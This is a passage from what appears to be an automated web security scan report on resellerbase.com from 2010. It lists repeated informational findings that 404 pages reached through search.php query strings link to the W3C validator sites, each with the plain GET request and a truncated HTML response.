<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.214. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.215. http://www.resellerbase.com/detail/41/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.216. http://www.resellerbase.com/detail/41/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.217. http://www.resellerbase.com/detail/42/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/42/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.218. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.219. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.220. http://www.resellerbase.com/detail/42/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.221. http://www.resellerbase.com/detail/42/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.222. http://www.resellerbase.com/detail/44/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/44/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/44/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.223. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.224. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.225. http://www.resellerbase.com/detail/44/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.226. http://www.resellerbase.com/detail/44/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.227. http://www.resellerbase.com/detail/45/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/45/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/45/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.228. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.229. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.230. http://www.resellerbase.com/detail/45/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.231. http://www.resellerbase.com/detail/45/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
